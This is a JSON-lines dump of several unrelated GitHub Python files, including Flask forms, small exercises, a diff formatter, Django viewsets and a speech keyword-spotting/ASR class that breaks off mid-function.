StringField(('benchmark_results config'),\n description=(''),\n validators=[DataRequired()],\n widget=BS3TextAreaFieldWidget_1())\n yaml3 = StringField(('benchmark_metadata config'),\n description=(''),\n validators=[DataRequired()],\n widget=BS3TextAreaFieldWidget_1())\n #reset = SubmitField(\"Reset\",widget=BS3ButtonFieldWidget())\n\n\nclass NewTestrunForm(DynamicForm):\n testrun = StringField(\n ('testrun'),\n description=('Note: duplicate testruns are not allowed'),\n validators=[DataRequired()],\n widget=BS3TextFieldWidget())\n","repo_name":"virt-s1/perf-insight","sub_path":"dashboard_server/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"93"} +{"seq_id":"25226002110","text":"# Zadatak 1 – for petlja, funkcija len, izrezivanje niza (slicing), operator uvišestručenja *\n# Napišite program koji će unositi neko ime te potom ispisivati to ime na sljedeći način:\n# Koristite samo jednu for petlju, jednu naredbu ispisa i operator * za razmake (npr. 5 * ' ')\n\n\n\ndef ispis(ime):\n for i in range(1, len(ime)+1):\n pocetak = ime[0:i]\n kraj = ime[-i:]\n slovo = ime[-i].upper()\n print(pocetak, \" \" * 5, kraj, \" \" * 5, slovo)\n \ndef main():\n unosIme = input(\"Unesite ime: \")\n ispis(unosIme)\nmain()","repo_name":"junkie385/UPROG","sub_path":"UPROG LAB 10/Zadatak01.py","file_name":"Zadatak01.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"42665535657","text":"#usr/bin/python\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nplt.close('all')\r\n\r\ndf = pd.read_excel(r'C:\\Users\\kkepa\\Desktop\\hokulele\\starnav\\latLon_vs_rollPitch.xlsx')\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(1, 1, 1)\r\n\r\nlatitude_error = df['lat_error']\r\nlongitude_error = df['lon_error']\r\nplt.plot(longitude_error, latitude_error, 'o', label = 'Error')\r\nax.set_xlabel('Longitude (degrees)')\r\nax.set_ylabel('Latitude (degrees)')\r\nax.set_title('Coordinate Error')\r\n\r\n\r\nlatitude = 0\r\nlongitude = 0\r\nplt.plot(longitude, latitude, 'o', c = 'green', label = 'Actual')\r\nplt.legend()\r\n\r\nplt.show()\r\n","repo_name":"kkepaalama/StarNav","sub_path":"latlonError.py","file_name":"latlonError.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"41049227638","text":"EXTENDED_SPACE = ' '\nCOUNT_INDENT = 4\n\n\ndef stylish(tree, depth):\n # Function displays the difference describing changes in the string.\n result = ['{']\n open_indent = EXTENDED_SPACE * (COUNT_INDENT * depth - 2)\n close_indent = EXTENDED_SPACE * (COUNT_INDENT * (depth - 1))\n for node in tree:\n key = node.get('key')\n value = format_value(node.get('value'), depth + 1)\n type = node.get('type')\n if type == 'ADDED':\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol='+', key=key,\n value=value\n ))\n elif type == 'DELETED':\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol='-', key=key,\n value=value\n ))\n elif type == 'UNCHANGED':\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol=' ', key=key,\n value=value\n ))\n elif type == 'NESTED':\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol=' ', key=key,\n value=stylish(node.get('value'), depth + 1)\n ))\n else:\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol='-', key=key,\n value=value\n ))\n result.append('{current_indent}{symbol} {key}: {value}'.format(\n current_indent=open_indent, symbol='+', key=key,\n value=format_value(node.get('value2'), depth + 1)\n ))\n result.append('{current_indent}{symbol}'.format(\n current_indent=close_indent, symbol='}'\n ))\n return '\\n'.join(result)\n\n\ndef format_value(node, depth):\n # Function converts values.\n open_indent = EXTENDED_SPACE * (COUNT_INDENT * depth - 2)\n close_indent = EXTENDED_SPACE * (COUNT_INDENT * (depth - 1))\n if isinstance(node, dict):\n result = [\"{\"]\n for key, value in node.items():\n result.append('{EXTENDED_SPACE}{symbol} {key}: {value}'.format(\n EXTENDED_SPACE=open_indent, symbol=' ', key=key,\n value=format_value(value, depth + 1)\n ))\n result.append('{EXTENDED_SPACE}{symbol}'.format(\n EXTENDED_SPACE=close_indent, symbol='}'\n ))\n return '\\n'.join(result)\n else:\n return node\n\n\ndef get_stylish_format(tree):\n # The main function of the modul\n return stylish(tree, 1)\n","repo_name":"AnnaCanada/python-project-lvl2","sub_path":"gendiff/formats/stylish.py","file_name":"stylish.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"24855766572","text":"import urllib.request, urllib.parse, urllib.error\nimport json\n\n\napi_key = False\n# If you have a Google Places API key, enter it here\n# api_key = 'AIzaSy___IDByT70'\n# https://developers.google.com/maps/documentation/geocoding/intro\n\nif api_key is False:\n api_key = 42\n serviceurl = 'http://py4e-data.dr-chuck.net/json?'\nelse :\n serviceurl = 'https://maps.googleapis.com/maps/api/geocode/json?'\n\n\nwhile True:\n address = input('Enter location: ')\n if len(address) < 1: break\n\n #url = serviceurl + urllib.parse.urlencode({'address': address})\n url = serviceurl\n print('Retrieving', url)\n\n uh = urllib.request.urlopen(url)\n data = uh.read().decode()\n\n print('Retrieved', len(data), 'characters')\n print(data)\n ##data =\n\n try:\n js = json.loads(data)\n except:\n js = None\n\n print(json.dumps(js, indent=4))\n\n #info = json.loads(data)\n #print('User count:', len(info))\n\n #print(json.dumps(js, indent=4))\n\n #for item in info:\n # print('Name', item['name'])\n # print('Id', item['id'])\n # print('Attribute', item['x'])\n\n break\n","repo_name":"PoptropicaSahil/ML-resources","sub_path":"Old Courses/py4e/Course 3/json2_try.py","file_name":"json2_try.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"2593896776","text":"from rest_framework.permissions import AllowAny\nfrom rest_framework.viewsets import ModelViewSet\nfrom api.models import Bachelier, DemandeDeDiplome\nfrom rest_framework.permissions import IsAuthenticated\nfrom api.serileazers import DemandeDeDiplomeSerileazers, BachelierSerileazers\n\n\nclass DemandeDeDiplomeViewSet(ModelViewSet):\n serializer_class = DemandeDeDiplomeSerileazers\n permission_classes = (AllowAny,)\n queryset = DemandeDeDiplome.objects.all()\n\n\nclass BachelierViewSet(ModelViewSet):\n\n serializer_class = BachelierSerileazers\n\n def get_permissions(self):\n if self.request.method == \"GET\":\n self.permission_classes = [\n AllowAny,\n ]\n else:\n self.permission_classes = [\n IsAuthenticated,\n ]\n\n return super(BachelierViewSet, self).get_permissions()\n\n def get_queryset(self):\n filtre_num = self.request.GET.get(\"numero\")\n filtre_nom_prenom = self.request.GET.get(\"nom_prenom\")\n\n if filtre_num and self.request.method == \"GET\":\n queryset = Bachelier.objects.filter(numero_iscription=filtre_num)\n if queryset:\n return queryset\n return []\n\n elif filtre_nom_prenom and self.request.method == \"GET\":\n nom, prenom = filtre_nom_prenom.split(\"__\")\n queryset = Bachelier.objects.filter(\n nom=nom.upper(), prenom=\" \".join(prenom.split(\"_\"))\n )\n if queryset:\n return queryset\n return []\n\n else:\n queryset = Bachelier.objects.all()\n\n return queryset\n","repo_name":"JoyoRichard007/Diploma","sub_path":"backend/api/views/DemandeDeDiplomeView.py","file_name":"DemandeDeDiplomeView.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"40631524433","text":"import numpy as np\nimport os\nfrom scipy.ndimage.morphology import binary_dilation\nimport struct\nimport torch\nimport webrtcvad\n\nfrom impl.file_tools import load_module_from_disk\nfrom impl.asr_feature_pyimpl import Feature\nimport impl.model_tool as model\nimport impl.asr_decode_pyimpl as Decode_Python\nimport impl.asr_decode_beamsearch as Decode_BeamSearch\n\nfrom impl.rm_common_library.KeywordSearch.keyword_graph import PrimaryGraph, Graph\nfrom impl.rm_common_library.KeywordSearch.command_graph import CommandGraph, Command\nfrom impl.rm_common_library.KeywordSearch.token_pass_match import primary_token_pass\n\n\nclass KwsAsrApi():\n \"\"\"\n KwsAsrApi\n \"\"\"\n\n def __init__(self, bool_do_kws_wakeup=True, bool_do_asr=True, bool_gpu=True):\n self.bool_do_kws_wakeup = bool_do_kws_wakeup\n self.bool_do_asr = bool_do_asr\n self.bool_gpu = bool_gpu\n\n # cfg init\n cfg_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"RMAI_KWS_ASR_options_Canbin.py\")\n self.cfg = load_module_from_disk(cfg_path).cfg\n # param_init\n self.param_init()\n\n # kws_asr_init\n self.kws_asr_init()\n\n def param_init(self):\n self.params_dict = {}\n\n # container\n self.params_dict['audio_data_container_np'] = np.array([])\n self.params_dict['feature_data_container_np'] = np.array([])\n self.params_dict['kws_container_np'] = np.array([]) # kws 结构容器中,用于滑窗输出结果\n self.params_dict['vad_bool_container'] = [] # vad 结构容器中,用于判断连续 5s 输出\n self.params_dict['output_wave_list'] = []\n self.params_dict['asr_duplicate_counter'] = {}\n\n self.params_dict['asr_vad_audio_data_container_np'] = np.zeros(\n int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_audio_data_ms / 1000.0))\n self.params_dict['asr_vad_flag'] = False\n self.params_dict['asr_vad_first_detect'] = True\n self.params_dict['asr_vad_activate_count'] = 0\n self.params_dict['asr_vad_activate_flag'] = False\n self.params_dict['asr_vad_activate_pos_id'] = 0\n self.params_dict['asr_vad_flag_count'] = 0\n self.params_dict['asr_vad_loop_times'] = 0\n\n self.params_dict['bool_wakeup'] = False\n self.params_dict['counter_asr'] = self.cfg.general.asr_suppression_counter - 1\n\n def kws_asr_init(self):\n # init model\n self.kws_init()\n self.asr_init()\n self.vad_init()\n self.graph_init()\n\n def run_kws_asr(self, audio_data):\n # init \n asr_command=[]\n asr_user_input=''\n # 准备数据和特征\n self.papare_data_and_feature(audio_data.copy())\n\n # 如果语音特征未装满容器,不进行唤醒和关键词检测\n if self.params_dict['feature_data_container_np'].shape[0] < self.cfg.general.feature_container_time:\n return\n\n # asr_duplicate_update_counter,更新计数器,防止重复检测\n self.asr_duplicate_update_counter()\n\n # 方案一:进行 kws 唤醒词检测,若检测到唤醒词,进入控制词识别模式\n # kws\n if not self.params_dict['bool_wakeup']:\n bool_find_kws = self.run_kws()\n\n if bool_find_kws:\n # 打印结果\n print(\"\\n===============!!!!!!!!!!!!!!===============\")\n print(\"********************************************\")\n print(\"** \")\n print(\"** [Information:] Device wakeup:\", \"wakeup\")\n print(\"** \")\n print(\"********************************************\\n\")\n\n self.params_dict['bool_wakeup'] = True\n asr_user_input=\"小锐小锐\"\n asr_command=Command()\n asr_command.tpe='A'\n asr_command.cmd = \"Wakeup\"\n else:\n \n bool_exit_wakeup, asr_output_tuple = self.run_asr_vad(audio_data)\n asr_user_input=asr_output_tuple[0]\n asr_command=asr_output_tuple[1]\n if bool_exit_wakeup:\n self.params_dict['bool_wakeup'] = False\n \n # 控制 asr 的间隔时间\n self.params_dict['counter_asr'] -= 1\n\n if len(asr_command):\n print(\"\\n===============!!!!!!!!!!!!!!===============\")\n print(\"********************************************\")\n print(\"** \")\n print(\"** [Information:] Detect Command:\", asr_command)\n print(\"** [Information:] User Input:\", asr_user_input)\n print(\"** \")\n print(\"********************************************\\n\")\n \n # 方案二:进行 asr 检测,间隔一定时长\n # asr\n # 如果检测到唤醒词,则执行方案一\n if self.params_dict['bool_wakeup']:\n self.params_dict['counter_asr'] = 0\n else:\n self.params_dict['counter_asr'] += 1\n\n if self.params_dict['counter_asr'] == self.cfg.general.asr_suppression_counter:\n self.params_dict['counter_asr'] = 0\n\n asr_output_tuple = self.run_asr(False)\n asr_user_input=asr_output_tuple[0]\n asr_command=asr_output_tuple[1]\n # 打印结果\n # 检测是否为 小锐小锐_唤醒词\n '''\n if '小锐小锐_唤醒' in asr_output_string:\n self.params_dict['bool_wakeup'] = True\n asr_output_string = \"wakeup \"\n '''\n if len(asr_command):\n print(\"\\n===============!!!!!!!!!!!!!!===============\")\n print(\"********************************************\")\n print(\"** \")\n print(\"** [Information:] Detect Command:\", asr_command)\n print(\"** [Information:] User Input:\", asr_user_input)\n print(\"** \")\n print(\"********************************************\\n\")\n else:\n print(\"\\n** [Information:] Detecting ...\\n\")\n return (asr_command,asr_user_input)\n\n def run_vad(self, wav):\n # Compute the voice detection window size\n samples_per_window = (self.cfg.general.vad_window_length * self.cfg.general.sample_rate) // 1000\n\n # Trim the end of the audio to have a multiple of the window size\n wav = wav[:len(wav) - (len(wav) % samples_per_window)]\n\n # Convert the float waveform to 16-bit mono PCM\n pcm_wave = struct.pack(\"%dh\" % len(wav), *(np.round(wav * self.cfg.general.int16_max)).astype(np.int16))\n\n # Perform voice activation detection\n voice_flags = []\n for window_start in range(0, len(wav), samples_per_window):\n window_end = window_start + samples_per_window\n voice_flags.append(self.vad.is_speech(pcm_wave[window_start * 2:window_end * 2],\n sample_rate=self.cfg.general.sample_rate))\n voice_flags = np.array(voice_flags)\n\n audio_mask = self.moving_average(voice_flags, self.cfg.general.vad_moving_average_width)\n audio_mask = np.round(audio_mask).astype(np.bool)\n\n # Dilate the voiced regions\n audio_mask = binary_dilation(audio_mask, np.ones(self.cfg.general.vad_max_silence_length + 1))\n audio_mask = np.repeat(audio_mask, samples_per_window)\n\n vad_bool = True if (audio_mask == True).sum() / len(audio_mask) > 0.0 else False\n self.params_dict['vad_bool_container'].append(vad_bool)\n\n if len(self.params_dict['vad_bool_container']) > self.cfg.general.vad_container_time:\n self.params_dict['vad_bool_container'] = self.params_dict['vad_bool_container'][\n - self.cfg.general.vad_container_time:]\n\n assert len(self.params_dict['vad_bool_container']) <= self.cfg.general.vad_container_time\n # print(\"vad: {} {}\".format(vad_bool, (audio_mask == True).sum()/len(audio_mask)))\n # print(\"vad_container: \", self.params_dict['vad_bool_container'])\n\n run_vad_bool = False\n if len(self.params_dict['vad_bool_container']) == self.cfg.general.vad_container_time:\n if np.array(self.params_dict['vad_bool_container']).sum() == 0:\n\n # 保证唤醒后,一定会将 3s 音频用于控制词识别\n if not self.params_dict['bool_wakeup']:\n run_vad_bool = True\n\n return run_vad_bool\n\n # Smooth the voice detection with a moving average\n def moving_average(self, array, width):\n array_padded = np.concatenate((np.zeros((width - 1) // 2), array, np.zeros(width // 2)))\n ret = np.cumsum(array_padded, dtype=float)\n ret[width:] = ret[width:] - ret[:-width]\n return ret[width - 1:] / width\n\n def sample_rate(self):\n return self.cfg.general.sample_rate\n\n def window_size_samples(self):\n return self.cfg.general.window_size_samples\n\n def window_stride_samples(self):\n return self.cfg.general.window_stride_samples\n\n def papare_data_and_feature(self, audio_data):\n # audio data\n # 拼接语音数据\n if len(self.params_dict['audio_data_container_np']):\n audio_data = np.concatenate((self.params_dict['audio_data_container_np'], audio_data), axis=0)\n\n # 存储指定时间的音频,用于后续拼接语音特征\n self.params_dict['audio_data_container_np'] = audio_data[\n len(audio_data) - self.cfg.general.window_container_samples:]\n\n # feature\n # 计算特征\n feature = Feature(self.cfg.general.sample_rate, int(self.cfg.general.feature_freq), int(self.cfg.general.nfilt))\n feature.get_mel_int_feature(audio_data)\n feature_data = feature.copy_mfsc_feature_int_to()\n\n # 拼接特征\n if not self.params_dict['feature_data_container_np'].shape[0]:\n self.params_dict['feature_data_container_np'] = feature_data\n elif self.params_dict['feature_data_container_np'].shape[0] < self.cfg.general.feature_container_time:\n self.params_dict['feature_data_container_np'] = np.concatenate((self.params_dict[\n 'feature_data_container_np'][\n : -self.cfg.general.feature_remove_after_time],\n feature_data), axis=0)\n else:\n self.params_dict['feature_data_container_np'] = np.concatenate((self.params_dict[\n 'feature_data_container_np'][\n self.cfg.general.feature_remove_before_time: -self.cfg.general.feature_remove_after_time],\n feature_data), axis=0)\n\n def kws_init(self):\n self.kws_net = None\n\n if not self.bool_do_kws_wakeup:\n return\n\n # init model\n if self.cfg.model.bool_caffe:\n self.kws_net = model.caffe_model_init(self.cfg.model.kws_prototxt_path,\n self.cfg.model.kws_model_path,\n self.cfg.model.kws_net_input_name,\n self.cfg.model.kws_chw_params.split(\",\"),\n self.bool_gpu)\n elif self.cfg.model.bool_pytorch:\n self.kws_net = model.pytorch_kws_model_init(self.cfg.model.kws_chk_path,\n self.cfg.model.kws_model_name,\n self.cfg.model.kws_class_name,\n self.cfg.model.kws_num_classes,\n self.cfg.model.image_height,\n self.cfg.model.image_weidth,\n self.bool_gpu)\n else:\n raise Exception(\n \"bool_caffe = {}, bool_pytorch = {}\".format(self.cfg.model.bool_caffe, self.cfg.model.bool_pytorch))\n\n def asr_init(self):\n self.asr_net = None\n self.asr_decoder = None\n\n self.asr_beamsearch = None\n self.lm = None\n\n if not self.bool_do_asr:\n return \n\n # init model\n if self.cfg.model.bool_caffe:\n self.asr_net = model.caffe_model_init(self.cfg.model.asr_prototxt_path,\n self.cfg.model.asr_model_path,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_chw_params.split(\",\"),\n self.bool_gpu)\n elif self.cfg.model.bool_pytorch:\n self.asr_net = model.pytorch_asr_model_init(self.cfg.model.asr_chk_path,\n self.cfg.model.asr_model_name,\n self.cfg.model.asr_class_name,\n self.cfg.model.asr_num_classes,\n self.bool_gpu)\n else:\n raise Exception(\n \"bool_caffe = {}, bool_pytorch = {}\".format(self.cfg.model.bool_caffe, self.cfg.model.bool_pytorch))\n\n # init bpe dict \n self.asr_decoder = Decode_Python.Decode()\n self.asr_decoder.init_symbol_list(self.cfg.model.asr_dict_path)\n \n # init lm\n if self.cfg.general.decode_id == 1:\n self.asr_decoder.init_lm_model(self.cfg.model.asr_lm_path)\n \n lexicon = Decode_BeamSearch.load_lexicon(self.cfg.model.asr_dict_path)\n self.asr_beamsearch = Decode_BeamSearch.BeamSearch(lexicon, beam_size=15)\n self.lm = Decode_BeamSearch.Ken_LM(self.cfg.model.asr_lm_path)\n\n\n def vad_init(self):\n self.vad = None\n self.vad = webrtcvad.Vad(mode=self.cfg.model.vad_mode)\n\n def graph_init(self):\n self.graph = None\n self.graph = CommandGraph.build(self.cfg.model.graph_path)\n #self.graph = Graph.build(self.cfg.model.graph_path)\n\n def run_kws(self):\n # init\n kws_score_list = []\n\n if not self.bool_do_kws_wakeup:\n return False\n\n # 滑窗,模型前传\n # 每次送入 1s 数据,只需要对 1s 音频特征进行滑窗,模型前传;否则,会出现重复检测\n kws_wakeup_times = int((self.cfg.general.feature_time) * 1.0 / self.cfg.general.kws_stride_feature_time) + 1\n\n # 对每次送入的 1s 数据进行模型前传\n for kws_wakeup_time in range(kws_wakeup_times):\n end_feature_time = self.params_dict['feature_data_container_np'].shape[0] - (\n kws_wakeup_times - kws_wakeup_time) * self.cfg.general.kws_stride_feature_time\n start_feature_time = end_feature_time - int(self.cfg.general.kws_feature_time)\n assert start_feature_time >= 0, \"kws wakeup model 特征时间维度太大, 处理音频数据无法获得 {} 次滑窗结果\".format(kws_wakeup_times)\n\n feature_data_kws = self.params_dict['feature_data_container_np'][start_feature_time: end_feature_time, :]\n feature_data_kws = feature_data_kws.astype(np.float32)\n\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.kws_net,\n feature_data_kws,\n self.cfg.model.kws_net_input_name,\n self.cfg.model.kws_net_output_name,\n self.cfg.model.kws_transpose)\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.kws_net,\n feature_data_kws,\n self.bool_gpu)\n\n net_output = np.squeeze(net_output)\n kws_score_list.append(net_output.copy())\n\n # 如果有保留的 kws 结果,进行拼接\n kws_score_np = np.array(kws_score_list)\n if len(self.params_dict['kws_container_np']):\n kws_score_np = np.concatenate((self.params_dict['kws_container_np'], kws_score_np), axis=0)\n\n bool_find_kws = False\n for kws_idx in range(len(kws_score_np) + 1 - kws_wakeup_times):\n # 滑窗,获得后处理结果\n detected_number = 0\n for kws_times in range(kws_wakeup_times):\n if kws_score_np[kws_idx + kws_times][-1] > self.cfg.general.kws_detection_threshold:\n detected_number += 1\n\n if detected_number >= kws_wakeup_times * self.cfg.general.kws_detection_number_threshold:\n bool_find_kws = True\n\n if bool_find_kws:\n self.params_dict['kws_container_np'] = np.zeros(np.array(kws_score_list).shape)\n else:\n # 存储一定时间的 kws 结果,用于后续滑窗获得结果\n self.params_dict['kws_container_np'] = np.array(kws_score_list)\n\n return bool_find_kws\n\n def run_asr(self, contorl_kws_bool=True):\n if not self.bool_do_asr:\n return ('',[])\n\n asr_tuple = self.run_asr_normal(contorl_kws_bool)\n user_string=asr_tuple[0]\n asr_string=asr_tuple[1]\n if len(asr_string):\n asr_string = self.asr_duplicate_check(asr_string)\n return (user_string,asr_string)\n\n def run_asr_normal(self, contorl_kws_bool=True):\n canbin_mode=True\n result_tuple=('',[])\n if not self.bool_do_asr:\n return result_tuple\n\n # 获取特征\n feature_data_asr = self.params_dict['feature_data_container_np'][-self.cfg.general.asr_feature_time:, :].astype(np.float32)\n \n # 模型前向传播\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.asr_net,\n feature_data_asr,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_net_output_name)\n net_output = np.squeeze(net_output)\n net_output = net_output.T\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.asr_net,\n feature_data_asr,\n self.bool_gpu)\n net_output = np.squeeze(net_output)\n\n # decode\n if self.cfg.general.decode_id == 0:\n self.asr_decoder.ctc_decoder(net_output)\n elif self.cfg.general.decode_id == 1:\n self.asr_decoder.beamsearch_decoder(net_output, 5, 0, bswt=1.0, lmwt=0.3)\n else:\n raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n if self.cfg.general.language_id == 0:\n if(canbin_mode):\n symbol_list = self.asr_decoder.output_symbol_list()\n if(len(symbol_list)==0):\n return ('',[])\n if(0):\n detect_token = primary_token_pass(symbol_list, self.graph)\n if not detect_token is None:\n result_tuple = Decode_Python.get_ouststr(detect_token)\n if('clamdown' in result_tuple[0] or 'hidden' in result_tuple[0]):\n return result_tuple\n else:\n return ('',[])\n else:\n detect_token = self.graph.parse_command(symbol_list)\n if(len(detect_token.commands)==0 or (detect_token.commands[0].tpe!='F' and detect_token.commands[0].tpe!='H')):\n return ('',[])\n else:\n return (detect_token.symbols,detect_token.commands)\n else:\n self.asr_decoder.show_result_id()\n self.asr_decoder.show_symbol()\n # result_string = self.asr_decoder.output_symbol()\n self.asr_decoder.match_keywords_chinese(self.cfg.general.kws_list, self.cfg.general.kws_dict)\n result_string = self.asr_decoder.output_control_result_string(self.cfg.general.control_kws_list,\n contorl_kws_bool)\n elif self.cfg.general.language_id == 1:\n pass\n else:\n raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n return result_tuple\n\n def run_asr_vad(self, audio_data):\n asr_vad_max_activate_count=16\n asr_vad_activate_threshold=10\n asr_vad_deactivate_threshold=2\n result_command=Command()\n # init \n result_tuple = ('',[])\n self.params_dict['asr_vad_audio_data_container_np'][self.cfg.general.sample_rate * (int(self.cfg.general.asr_vad_audio_data_ms / 1000.0)- 1):] = audio_data\n\n # 进入 asr vad 模式\n if not self.params_dict['asr_vad_flag']:\n self.params_dict['asr_vad_flag'] = True\n\n # 状态变化\n self.params_dict['asr_vad_flag_count'] += 1\n print(\"[Information:] Go into run_asr_vad, asr_vad_flag_count: \", self.params_dict['asr_vad_flag_count'])\n\n # 循环检测 vad\n audio_data_len = len(audio_data)\n for i in range(0, audio_data_len - 480, 480):\n\n # vad 计数,表示当前时刻是否已经结束\n vad_wav = audio_data[i: i + 480].astype(np.int16).tobytes()\n if self.vad.is_speech(vad_wav, sample_rate=self.cfg.general.sample_rate):\n self.params_dict['asr_vad_activate_count'] += 1\n else:\n self.params_dict['asr_vad_activate_count'] -= 1\n self.params_dict['asr_vad_activate_count'] = max(0, min(self.params_dict['asr_vad_activate_count'], asr_vad_max_activate_count))\n\n # vad 起点位置确立\n if (self.params_dict['asr_vad_activate_count'] > asr_vad_activate_threshold and self.params_dict[\n 'asr_vad_activate_flag'] == False):\n self.params_dict['asr_vad_activate_flag'] = True\n self.params_dict['asr_vad_activate_pos_id'] = self.cfg.general.sample_rate * 5 + i - asr_vad_activate_threshold * 480\n\n # vad 终点位置确立\n if self.params_dict['asr_vad_activate_count'] < asr_vad_deactivate_threshold:\n\n # 判断是否确立起始位置\n if not self.params_dict['asr_vad_activate_flag'] == True:\n continue\n \n # 方式一:收集音频,重新计算特征\n # # 获取音频数据\n # wave = self.params_dict['asr_vad_audio_data_container_np'][\n # self.params_dict['asr_vad_activate_pos_id']: min(self.cfg.general.sample_rate * 5 + i + 960,\n # self.cfg.general.sample_rate * 6)]\n\n # # 计算有效音频长度,判断是否小于检测最短长度\n # if len(wave) < int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_minitime_threshold_s[self.params_dict['asr_vad_loop_times']]):\n # continue\n\n # # 识别结果\n # print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n # result_tuple = self.asr_vad_detecte(wave)\n\n # 方式二:直接从容器里抽取特征\n # 获取音频数据\n start_pos_id = self.params_dict['asr_vad_activate_pos_id']\n end_pos_id = min(self.cfg.general.sample_rate * 5 + i + 960, self.cfg.general.sample_rate * 6)\n wave_len = end_pos_id - start_pos_id\n\n # 计算有效音频长度,判断是否小于检测最短长度\n if wave_len < int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_minitime_threshold_s[self.params_dict['asr_vad_loop_times']]):\n continue\n\n # 识别结果\n print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n result_tuple = self.asr_vad_detecte_pos(start_pos_id, end_pos_id)\n\n if len(result_tuple[1]) != 0:\n self.params_dict['asr_vad_first_detect']=False\n # 清空\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n else:\n # 状态变化\n result_command.tpe='W'\n self.params_dict['asr_vad_loop_times'] += 1\n if self.params_dict['asr_vad_first_detect']==False or self.params_dict['asr_vad_loop_times'] >= self.cfg.general.asr_vad_loop_threshold:\n # 清空\n self.asr_vad_state_reset()\n if(self.params_dict['asr_vad_first_detect']==False):\n result_command.cmd=self.cfg.general.string_end_safety\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_end_loop\n return True, ('',[result_command])\n else:\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n result_command.cmd=self.cfg.general.string_warring\n return False, ('',[result_command])\n\n # 缓存,移位\n self.params_dict['asr_vad_audio_data_container_np'][:self.cfg.general.sample_rate * 5] = self.params_dict[\n 'asr_vad_audio_data_container_np'][\n -self.cfg.general.sample_rate * 5:]\n\n if self.params_dict['asr_vad_activate_pos_id'] > 0:\n self.params_dict['asr_vad_activate_pos_id'] = max(0, self.params_dict['asr_vad_activate_pos_id'] - self.cfg.general.sample_rate)\n\n # check:判断没有说话\n if (self.params_dict['asr_vad_flag_count'] >= self.cfg.general.asr_vad_silence_threshold_s\n and self.params_dict['asr_vad_activate_flag'] == False):\n print(\"[Information:] silence >= {},未检测到声音\".format(self.cfg.general.asr_vad_silence_threshold_s))\n # 清空\n self.asr_vad_state_reset()\n result_command.tpe='W'\n result_command.cmd=self.cfg.general.string_end_safety\n if(self.params_dict['asr_vad_first_detect']==False):\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_silence_warring\n return True, ('',[result_command])\n\n # check:判断超过时长\n if self.params_dict['asr_vad_flag_count'] >= self.cfg.general.asr_vad_overtime_threshold_s:\n print(\"[Information:] overtime >= {},超长时间检测\".format(self.cfg.general.asr_vad_overtime_threshold_s))\n\n # 方式一:收集音频,重新计算特征\n # # 音频数据\n # wave = self.params_dict['asr_vad_audio_data_container_np'][\n # self.params_dict['asr_vad_activate_pos_id']: ]\n\n # # 识别结果\n # result_tuple = self.asr_vad_detecte(wave)\n\n # 方式二:直接从容器里抽取特征\n # 获取音频数据\n start_pos_id = self.params_dict['asr_vad_activate_pos_id']\n end_pos_id = self.cfg.general.sample_rate\n\n # 识别结果\n print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n result_tuple = self.asr_vad_detecte_pos(start_pos_id, end_pos_id)\n\n if len(result_tuple[1]) != 0:\n # 清空\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n else:\n # 状态变化\n result_command.tpe='W'\n self.params_dict['asr_vad_loop_times'] += 1\n if self.params_dict['asr_vad_first_detect']==False or self.params_dict['asr_vad_loop_times'] >= self.cfg.general.asr_vad_loop_threshold:\n # 清空\n self.asr_vad_state_reset()\n if(self.params_dict['asr_vad_first_detect']==False):\n result_command.cmd=self.cfg.general.string_end_safety\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_end_loop\n return True, ('',[result_command])\n else:\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n result_command.cmd=self.cfg.general.string_warring\n return False, ('',[result_command])\n\n # 返回,输出\n if self.params_dict['asr_vad_flag']:\n return False, result_tuple\n else:\n # 清空\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n\n def asr_vad_detecte(self, wave):\n # init\n result = ('',[])\n\n # feature\n # 计算特征\n feature = Feature(self.cfg.general.sample_rate, 